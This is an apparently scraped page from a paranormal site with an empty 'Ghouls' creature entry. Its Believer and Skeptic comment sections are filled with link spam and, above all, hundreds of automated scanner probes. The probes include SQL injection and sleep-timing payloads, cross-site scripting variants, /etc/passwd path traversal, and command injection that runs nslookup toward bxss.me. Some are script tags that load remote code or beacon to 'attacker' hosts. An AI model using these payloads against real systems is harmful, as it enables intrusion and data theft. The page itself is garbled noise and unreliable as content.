Tweet

Ghouls

picture of a ghoul

Location:

Height:

Weight:

Danger Level: high!

Other names:

Category: Creatures/Mystical Beings

Description:

History and Origin:

Stories Say:

Skeptics Say:

Believers Believe:

Close:

Links to other pages:

None for now

Believer Comments


Kalie

Keep on writing and chggniug away!


Ronalee

That's an expert answer to an <a href="http://yrsxidshflo.com">inseiettrng</a> question


Jetson

At last, sonomee who comes to the heart of it all http://sdbpze.com [url=http://flaucvdxwf.com]flaucvdxwf[/url] [link=http://nppmciwkph.com]nppmciwkph[/link]


Karson

To think, I was <a href="http://jshzmt.com">cosnufed</a> a minute ago.


Snowy

That's a creative answer to a diulcifft question http://akwwjctv.com [url=http://mxxmzc.com]mxxmzc[/url] [link=http://zcvhwwfnyyq.com]zcvhwwfnyyq[/link]


khvojpaw

1


jmxxsfyu

response.write(9315198*9967954)


dsinelsf

1


jmxxsfyu

'+response.write(9315198*9967954)+'


dsinelsf

1


jmxxsfyu

"+response.write(9315198*9967954)+"


response.write(9249114*9057297)

1


dsinelsf

-1 OR 2+395-395-1=0+0+0+1 --


'+response.write(9249114*9057297)+'

1


dsinelsf

-1 OR 3+395-395-1=0+0+0+1 --


"+response.write(9249114*9057297)+"

1


dsinelsf

-1 OR 3*2<(0+5+395-395) --


dsinelsf

-1 OR 3*2>(0+5+395-395) --


ebgkpoah

1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013511&r=487-511&h=487-4a01d-2&/).slice(2),document.documentElement.appendChild(s))//'>


dsinelsf

-1 OR 2+286-286-1=0+0+0+1


ocmtvqvn

set|set&set


ebgkpoah

1'>"><script src=http://bxss.me/s?u=013511&r=487-512&h=487-4a01d-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013511,487-512,487,4a01d,%22%5D"/>


dsinelsf

-1 OR 3+286-286-1=0+0+0+1


ocmtvqvn

$(nslookup dns.ce.\013511.487-513.487.4a01d.\1.bxss.me)


ebgkpoah</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013511&r=487-514&h=487-4a01d-2&/).slice(2),document.documentElement.appendChild(s))//'>

1


dsinelsf

-1 OR 3*2<(0+5+286-286)


xgjvfwqg

lOa1u7wj


ocmtvqvn

&nslookup dns.ce.\013511.487-515.487.4a01d.\1.bxss.me&'\"`0&nslookup dns.ce.\013511.487-515.487.4a01d.\1.bxss.me&`'


ebgkpoah'>"><script src=http://bxss.me/s?u=013511&r=487-516&h=487-4a01d-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013511,487-516,487,4a01d,%22%5D"/>

1


dsinelsf

-1 OR 3*2>(0+5+286-286)


O8zzWy9D

1


set|set&set

1


dsinelsf

-1' OR 2+37-37-1=0+0+0+1 --


$(nslookup dns.ce.\013511.487-517.487.4a01d.\1.bxss.me)

1


dsinelsf

-1' OR 3+37-37-1=0+0+0+1 --


rxcrtygy

1 bcc:013511.487-518.487.4a01d.1@bxss.me


hbryfrrm

../../../../../../../../../../etc/passwd


&nslookup dns.ce.\013511.487-519.487.4a01d.\1.bxss.me&'\"`0&nslookup dns.ce.\013511.487-519.487.4a01d.\1.bxss.me&`'

1


dsinelsf

-1' OR 3*2<(0+5+37-37) --


rxcrtygy

to@example.com> bcc:013511.487-520.487.4a01d.1@bxss.me


hbryfrrm

../../../../../../../../../../../../../../../proc/version


dsinelsf

-1' OR 3*2>(0+5+37-37) --


rxcrtygy bcc:013511.487-521.487.4a01d.1@bxss.me

1


hbryfrrm

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


sybpijcv

1


dsinelsf

-1' OR 2+371-371-1=0+0+0+1 or 'iavNXKDY'='


to@example.com> bcc:013511.487-522.487.4a01d.1@bxss.me

1


hsuvoxen

${10000333+10000064}


hbryfrrm

../../../../../../../../../../etc/passwd.jpg


dsinelsf

-1' OR 3+371-371-1=0+0+0+1 or 'iavNXKDY'='


${10000352+10000044}

1


hbryfrrm

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


dsinelsf

-1' OR 3*2<(0+5+371-371) or 'iavNXKDY'='


hbryfrrm

/../..//../..//../..//../..//../..//etc/passwd.jpg


kweqdios

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


dsinelsf

-1' OR 3*2>(0+5+371-371) or 'iavNXKDY'='


hbryfrrm

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd


kweqdios

1some_inexistent_file_with_long_name.jpg


dsinelsf

-1" OR 2+931-931-1=0+0+0+1 --


hbryfrrm

/etc/passwd


kweqdios

Http://testasp.vulnweb.com/t/fit.txt


sybpijcv

1


dsinelsf

-1" OR 3+931-931-1=0+0+0+1 --


hbryfrrm

%2fetc%2fpasswd


kweqdios

http://testasp.vulnweb.com/t/fit.txt?.jpg


Anonymous Poster

1


dsinelsf

-1" OR 3*2<(0+5+931-931) --


hbryfrrm

/.././.././.././.././.././.././.././../etc/./passwd%00


kweqdios

testasp.vulnweb.com


Anonymous Poster

1


RG1DSkJEWmQ=

1


dsinelsf

-1" OR 3*2>(0+5+931-931) --


hbryfrrm

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

1


Anonymous Poster

1


dsinelsf

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/


hbryfrrm

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


1some_inexistent_file_with_long_name.jpg

1


dsinelsf

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/


Http://testasp.vulnweb.com/t/fit.txt

1


dsinelsf

-1; waitfor delay '0:0:6' --


ipwkrvik

1&n959612=v928236


hbryfrrm

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.


http://testasp.vulnweb.com/t/fit.txt?.jpg

1


tfvfsgsm

)


dsinelsf

-1); waitfor delay '0:0:6' --


ldwgmemy&n984048=v931323

1


hbryfrrm

file:///etc/passwd


testasp.vulnweb.com

1


dsinelsf

1 waitfor delay '0:0:6' --


hbryfrrm

/\../\../\../\../\../\../\../etc/passwd


tfvfsgsm

!(()&&!|*|*|


dsinelsf

qtI7Nz6d'; waitfor delay '0:0:6' --


hbryfrrm

WEB-INF/web.xml


xtxfwcwq

'"()


tfvfsgsm

^(#$!@#$)(()))******


dsinelsf

-1;select pg_sleep(6); --


vgyjcaih

;print(md5(acunetix_wvs_security_test));


hbryfrrm

/WEB-INF/web.xml


Anonymous Poster

1


dsinelsf

-1);select pg_sleep(9); --


vgyjcaih

';print(md5(acunetix_wvs_security_test));$a='


)

1


hbryfrrm

WEB-INF\web.xml


'"()

1


dsinelsf

-1));select pg_sleep(9); --


vgyjcaih

";print(md5(acunetix_wvs_security_test));$a="


!(()&&!|*|*|

1


../../../../../../../../../../etc/passwd

1


dsinelsf

ysWzPVo3';select pg_sleep(9); --


vgyjcaih

${@print(md5(acunetix_wvs_security_test))}


^(#$!@#$)(()))******

1


../../../../../../../../../../../../../../../proc/version

1


dsinelsf

BvvDkBsN');select pg_sleep(9); --


vgyjcaih

${@print(md5(acunetix_wvs_security_test))}\


fpuncqih

http://testasp.vulnweb.com/t/xss.html?%00.jpg


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1


dsinelsf

D0aSjJDl'));select pg_sleep(9); --


;print(md5(acunetix_wvs_security_test));

1


http://testasp.vulnweb.com/t/xss.html?%00.jpg

1


../../../../../../../../../../etc/passwd.jpg

1


';print(md5(acunetix_wvs_security_test));$a='

1


dsinelsf

1||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-523.487.4a01d.1.bxss'||'.me')


lkcrjkii

1


lcltmpur

http://hitVMw5ggRNWv.bxss.me/


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1


dsinelsf

'||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-524.487.4a01d.1.bxss'||'.me')||'


";print(md5(acunetix_wvs_security_test));$a="

1


lkcrjkii

m_ghouls.php


/../..//../..//../..//../..//../..//etc/passwd.jpg

1


dsinelsf

1;copy (select '') to program 'nslookup dns.sqli.\013511.487-525.487.4a01d.\1.bxss.me'


${@print(md5(acunetix_wvs_security_test))}

1


pltgbdbr

1


lkcrjkii

m_ghouls.php


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1


dsinelsf

1';copy (select '') to program 'nslookup dns.sqli.\013511.487-526.487.4a01d.\1.bxss.me


${@print(md5(acunetix_wvs_security_test))}\

1


http://hitwj731P2OZ5.bxss.me/

1


pltgbdbr

1'"


lkcrjkii

m_ghouls.php/.


/etc/passwd

1


pltgbdbr

\


dsinelsf

735'


lkcrjkii

1


%2fetc%2fpasswd

1


dsinelsf

1


m_ghouls.php

1


pltgbdbr

@@QuK5x


/.././.././.././.././.././.././.././../etc/./passwd%00

1


lchwyshp

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


dsinelsf

1


pqfgtyqq

/www.vulnweb.com


m_ghouls.php

1


pltgbdbr

JyI=


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1


-1 OR 2+145-145-1=0+0+0+1 --

1


m_ghouls.php/.

1


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1


pqfgtyqq

913253


-1 OR 3+145-145-1=0+0+0+1 --

1


Anonymous Poster

1


-1 OR 3*2<(0+5+145-145) --

1


pqfgtyqq

http://www.vulnweb.com


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1


nijedplx

'"


pltgbdbr

1


-1 OR 3*2>(0+5+145-145) --

1


pqfgtyqq

//www.vulnweb.com


file:///etc/passwd

1


-1 OR 2+245-245-1=0+0+0+1

1


ebnovceo

1'"()&%<acx><ScRiPt >DkZp(9588)</ScRiPt>


nijedplx

<!--


1'"

1


pqfgtyqq

/\www.vulnweb.com


-1 OR 3+245-245-1=0+0+0+1

1


/\../\../\../\../\../\../\../etc/passwd

1


\

1


-1 OR 3*2<(0+5+245-245)

1


'"

1


ebnovceo

'"()&%<acx><ScRiPt >DkZp(9646)</ScRiPt>


WEB-INF/web.xml

1


Anonymous Poster

1


/www.vulnweb.com

1


-1 OR 3*2>(0+5+245-245)

1


<!--

1


@@wQtsa

1


969169

1


ebnovceo

19936826


/WEB-INF/web.xml

1


-1' OR 2+351-351-1=0+0+0+1 --

1


JyI=

1


http://www.vulnweb.com

1


WEB-INF\web.xml

1


-1' OR 3+351-351-1=0+0+0+1 --

1


Anonymous Poster

1


ebnovceo

acu1239<s1﹥s2ʺs3ʹuca1239


//www.vulnweb.com

1


-1' OR 3*2<(0+5+351-351) --

1


Anonymous Poster

1


/\www.vulnweb.com

1


-1' OR 3*2>(0+5+351-351) --

1


-1' OR 2+429-429-1=0+0+0+1 or 'SOhJ3D5M'='

1


ebnovceo

{{10000366*10000169}}


-1' OR 3+429-429-1=0+0+0+1 or 'SOhJ3D5M'='

1


ebnovceo

1<ScRiPt >DkZp(9960)</ScRiPt>


-1' OR 3*2<(0+5+429-429) or 'SOhJ3D5M'='

1


ebnovceo

1<WPU5OJ>UYPPT[!+!]</WPU5OJ>


ebnovceo

1<script>DkZp(9120)</script>


-1' OR 3*2>(0+5+429-429) or 'SOhJ3D5M'='

1


ebnovceo

1<ScR<ScRiPt>IpT>DkZp(9676)</sCr<ScRiPt>IpT>


-1" OR 2+610-610-1=0+0+0+1 --

1


ebnovceo

1<ScRiPt >DkZp(9591)</ScRiPt>


-1" OR 3+610-610-1=0+0+0+1 --

1


ebnovceo

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9656></ScRiPt>


-1" OR 3*2<(0+5+610-610) --

1


ebnovceo

1<ScRiPt >DkZp(9607)</ScRiPt>


-1" OR 3*2>(0+5+610-610) --

1


ebnovceo

1<video><source onerror="javascript:DkZp(9447)">


if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1


(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1


ebnovceo

1<isindex type=image src=1 onerror=DkZp(9591)>


1 waitfor delay '0:0:6' --

1


ebnovceo

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9968'>


6P5El2hO'; waitfor delay '0:0:6' --

1


ebnovceo

1<body onload=DkZp(9946)>


4vpSiYgg';select pg_sleep(6); --

1


ebnovceo

1<img src=//testasp.vulnweb.com/t/dot.gif onload=DkZp(9284)>


ebnovceo

1<img src=xyz OnErRor=DkZp(9804)>


AeV1OwLn');select pg_sleep(6); --

1


YRQgVE1u'));select pg_sleep(9); --

1


ebnovceo

1<img/src=">" onerror=alert(9541)>


'||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-541.487.4a01d.1.bxss'||'.me')||'

1


ebnovceo

%31%3C%53%63%52%69%50%74%20%3E%44%6B%5A%70%289913%29%3C%2F%73%43%72%69%70%54%3E


dsinelsf';copy (select '') to program 'nslookup dns.sqli.\013511.487-542.487.4a01d.\1.bxss.me

1


ebnovceo

1\u003CScRiPt\DkZp(9329)\u003C/sCripT\u003E


283'

1


ebnovceo

1&lt;ScRiPt&gt;DkZp(9438)&lt;/sCripT&gt;


ebnovceo

1<input autofocus onfocus=DkZp(9850)>


ebnovceo

<a HrEF=http://www.vulnweb.com></a>


ebnovceo

<a HrEF=jaVaScRiPT:>


ebnovceo

[url=http://www.vulnweb.com][/url]


ebnovceo

1<img<!-- --> src=x onerror=alert(9812);//><!-- -->


ebnovceo

1}body{acu:Expre/**/SSion(DkZp(9994))}


ebnovceo

1<% contenteditable onresize=DkZp(9765)>


ebnovceo

1JZwnL <ScRiPt >DkZp(9032)</ScRiPt>


ebnovceo

1<WGAGCC>1KDYI[!+!]</WGAGCC>


ebnovceo

1<ifRAme sRc=9042.com></IfRamE>


ebnovceo

1<aKjtoY x=9939>


ebnovceo

1<img sRc='http://attacker-9593/log.php?


ebnovceo

1<drh2Ea<


ebnovceo'"()&%<acx><ScRiPt >DkZp(9043)</ScRiPt>

1


'"()&%<acx><ScRiPt >DkZp(9501)</ScRiPt>

1


ebnovceo9281541

1


acu3151<s1﹥s2ʺs3ʹuca3151

1


Anonymous Poster

1


Anonymous Poster

1


{{9999174*9999847}}

1


ebnovceo<ScRiPt >DkZp(9724)</ScRiPt>

1


ebnovceo<WPF0HO>GFYAK[!+!]</WPF0HO>

1


ebnovceo<script>DkZp(9184)</script>

1


ebnovceo<ScR<ScRiPt>IpT>DkZp(9687)</sCr<ScRiPt>IpT>

1


ebnovceo<ScRiPt >DkZp(9310)</ScRiPt>

1


ebnovceo<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9046></ScRiPt>

1


ebnovceo<ScRiPt >DkZp(9097)</ScRiPt>

1


ebnovceo<video><source onerror="javascript:DkZp(9961)">

1


Anonymous Poster

1


ebnovceo<isindex type=image src=1 onerror=DkZp(9589)>

1


ebnovceo<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9087'>

1


ebnovceo<body onload=DkZp(9763)>

1


ebnovceo<img src=//testasp.vulnweb.com/t/dot.gif onload=DkZp(9769)>

1


ebnovceo<img src=xyz OnErRor=DkZp(9977)>

1


ebnovceo<img/src=">" onerror=alert(9593)>

1


%65%62%6E%6F%76%63%65%6F%3C%53%63%52%69%50%74%20%3E%44%6B%5A%70%289119%29%3C%2F%73%43%72%69%70%54%3E

1


ebnovceo\u003CScRiPt\DkZp(9011)\u003C/sCripT\u003E

1


ebnovceo&lt;ScRiPt&gt;DkZp(9490)&lt;/sCripT&gt;

1


Anonymous Poster

1


ebnovceo<input autofocus onfocus=DkZp(9738)>

1


<a HrEF=http://www.vulnweb.com></a>

1


<a HrEF=jaVaScRiPT:>

1


[url=http://www.vulnweb.com][/url]

1


ebnovceo<img<!-- --> src=x onerror=alert(9716);//><!-- -->

1


ebnovceo}body{acu:Expre/**/SSion(DkZp(9882))}

1


ebnovceo<% contenteditable onresize=DkZp(9811)>

1


ebnovceovekiV <ScRiPt >DkZp(9670)</ScRiPt>

1


ebnovceo<WCI75L>JURXW[!+!]</WCI75L>

1


ebnovceo<ifRAme sRc=9522.com></IfRamE>

1


ebnovceo<K5vpdw x=9409>

1


ebnovceo<img sRc='http://attacker-9816/log.php?

1


ebnovceo<E6mPXo<

1


1acuy2HmcGUlX3

1


giywnvqh

1acu0aQ8UTgn9S


guspdlox

1'"()&%<acx><ScRiPt >VLtP(9701)</ScRiPt>


guspdlox

'"()&%<acx><ScRiPt >VLtP(9200)</ScRiPt>


guspdlox

19122288


guspdlox

acu7647<s1﹥s2ʺs3ʹuca7647


guspdlox

{{9999512*9999580}}


guspdlox

1<ScRiPt >VLtP(9561)</ScRiPt>


guspdlox

1<WFSB5M>G6VIA[!+!]</WFSB5M>


guspdlox

1<script>VLtP(9701)</script>


guspdlox

1<ScR<ScRiPt>IpT>VLtP(9481)</sCr<ScRiPt>IpT>


guspdlox

1<ScRiPt >VLtP(9407)</ScRiPt>


guspdlox

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9094></ScRiPt>


guspdlox

1<ScRiPt >VLtP(9680)</ScRiPt>


guspdlox

1<video><source onerror="javascript:VLtP(9043)">


guspdlox

1<isindex type=image src=1 onerror=VLtP(9666)>


guspdlox

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9395'>


guspdlox

1<body onload=VLtP(9863)>


guspdlox

1<img src=//testasp.vulnweb.com/t/dot.gif onload=VLtP(9827)>


guspdlox

1<img src=xyz OnErRor=VLtP(9402)>


guspdlox

1<img/src=">" onerror=alert(9644)>


guspdlox

%31%3C%53%63%52%69%50%74%20%3E%56%4C%74%50%289924%29%3C%2F%73%43%72%69%70%54%3E


guspdlox

1\u003CScRiPt\VLtP(9920)\u003C/sCripT\u003E


guspdlox

1&lt;ScRiPt&gt;VLtP(9529)&lt;/sCripT&gt;


guspdlox

1<input autofocus onfocus=VLtP(9262)>


guspdlox

<a HrEF=http://www.vulnweb.com></a>


guspdlox

<a HrEF=jaVaScRiPT:>


guspdlox

[url=http://www.vulnweb.com][/url]


guspdlox

1<img<!-- --> src=x onerror=alert(9395);//><!-- -->


guspdlox

1}body{acu:Expre/**/SSion(VLtP(9115))}


guspdlox

1<% contenteditable onresize=VLtP(9550)>


guspdlox

13yBCe <ScRiPt >VLtP(9120)</ScRiPt>


guspdlox

1<WDOWKH>2ZL5U[!+!]</WDOWKH>


guspdlox

1<ifRAme sRc=9774.com></IfRamE>


guspdlox

1<tYEVN4 x=9911>


guspdlox

1<img sRc='http://attacker-9799/log.php?


guspdlox

1<BOgNmL<


pvnncart'"()&%<acx><ScRiPt >VLtP(9437)</ScRiPt>

1


'"()&%<acx><ScRiPt >VLtP(9069)</ScRiPt>

1


pvnncart9874309

1


acu9049<s1﹥s2ʺs3ʹuca9049

1


Anonymous Poster

1


Anonymous Poster

1


{{9999965*9999947}}

1


pvnncart<ScRiPt >VLtP(9584)</ScRiPt>

1


pvnncart<WYOBPJ>6LTSM[!+!]</WYOBPJ>

1


pvnncart<script>VLtP(9561)</script>

1


pvnncart<ScR<ScRiPt>IpT>VLtP(9179)</sCr<ScRiPt>IpT>

1


pvnncart<ScRiPt >VLtP(9599)</ScRiPt>

1


pvnncart<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9212></ScRiPt>

1


pvnncart<ScRiPt >VLtP(9278)</ScRiPt>

1


pvnncart<video><source onerror="javascript:VLtP(9121)">

1


Anonymous Poster

1


pvnncart<isindex type=image src=1 onerror=VLtP(9160)>

1


pvnncart<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9751'>

1


pvnncart<body onload=VLtP(9382)>

1


pvnncart<img src=//testasp.vulnweb.com/t/dot.gif onload=VLtP(9494)>

1


pvnncart<img src=xyz OnErRor=VLtP(9209)>

1


pvnncart<img/src=">" onerror=alert(9449)>

1


%70%76%6E%6E%63%61%72%74%3C%53%63%52%69%50%74%20%3E%56%4C%74%50%289780%29%3C%2F%73%43%72%69%70%54%3E

1


pvnncart\u003CScRiPt\VLtP(9387)\u003C/sCripT\u003E

1


pvnncart&lt;ScRiPt&gt;VLtP(9827)&lt;/sCripT&gt;

1


Anonymous Poster

1


pvnncart<input autofocus onfocus=VLtP(9604)>

1


<a HrEF=http://www.vulnweb.com></a>

1


<a HrEF=jaVaScRiPT:>

1


[url=http://www.vulnweb.com][/url]

1


pvnncart<img<!-- --> src=x onerror=alert(9952);//><!-- -->

1


pvnncart}body{acu:Expre/**/SSion(VLtP(9655))}

1


pvnncart<% contenteditable onresize=VLtP(9595)>

1


pvnncartvHphf <ScRiPt >VLtP(9682)</ScRiPt>

1


pvnncart<WQLQKI>A5KMC[!+!]</WQLQKI>

1


pvnncart<ifRAme sRc=9545.com></IfRamE>

1


pvnncart<R4g1Gq x=9513>

1


pvnncart<img sRc='http://attacker-9387/log.php?

1


pvnncart<otksno<

1



Post a comment:





Skeptic Comments


seijlhas

1


tceqyxae

response.write(9571566*9514346)


rrirqwnt

1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013511&r=487-527&h=487-ab1c9-2&/).slice(2),document.documentElement.appendChild(s))//'>


pevdweua

set|set&set


tceqyxae

'+response.write(9571566*9514346)+'


mikennyx

1


tceqyxae

"+response.write(9571566*9514346)+"


rrirqwnt

1'>"><script src=http://bxss.me/s?u=013511&r=487-528&h=487-ab1c9-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013511,487-528,487,ab1c9,%22%5D"/>


response.write(9842314*9385426)

1


pevdweua

$(nslookup dns.ce.\013511.487-529.487.ab1c9.\1.bxss.me)


rrirqwnt</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013511&r=487-530&h=487-ab1c9-2&/).slice(2),document.documentElement.appendChild(s))//'>

1


mikennyx

1


'+response.write(9842314*9385426)+'

1


rrirqwnt'>"><script src=http://bxss.me/s?u=013511&r=487-532&h=487-ab1c9-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013511,487-532,487,ab1c9,%22%5D"/>

1


pevdweua

&nslookup dns.ce.\013511.487-533.487.ab1c9.\1.bxss.me&'\"`0&nslookup dns.ce.\013511.487-533.487.ab1c9.\1.bxss.me&`'


"+response.write(9842314*9385426)+"

1


mikennyx

-1 OR 2+926-926-1=0+0+0+1 --


set|set&set

1


mikennyx

-1 OR 3+926-926-1=0+0+0+1 --


adguxhvn

nTCI2AxE


lqekorij

../../../../../../../../../../etc/passwd


$(nslookup dns.ce.\013511.487-535.487.ab1c9.\1.bxss.me)

1


yGrsFcGj

1


mikennyx

-1 OR 3*2<(0+5+926-926) --


&nslookup dns.ce.\013511.487-536.487.ab1c9.\1.bxss.me&'\"`0&nslookup dns.ce.\013511.487-536.487.ab1c9.\1.bxss.me&`'

1


lqekorij

../../../../../../../../../../../../../../../proc/version


ybvockxp

1 bcc:013511.487-537.487.ab1c9.1@bxss.me


lqekorij

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


mikennyx

-1 OR 3*2>(0+5+926-926) --


ouvvgsww

1


cuooiddl

${9999934+10000377}


lqekorij

../../../../../../../../../../etc/passwd.jpg


ybvockxp

to@example.com> bcc:013511.487-538.487.ab1c9.1@bxss.me


${10000234+9999433}

1


mikennyx

-1 OR 2+766-766-1=0+0+0+1


jkaygfsb

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


ybvockxp bcc:013511.487-539.487.ab1c9.1@bxss.me

1


lqekorij

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


mikennyx

-1 OR 3+766-766-1=0+0+0+1


to@example.com> bcc:013511.487-540.487.ab1c9.1@bxss.me

1


jkaygfsb

1some_inexistent_file_with_long_name.jpg


lqekorij

/../..//../..//../..//../..//../..//etc/passwd.jpg


mikennyx

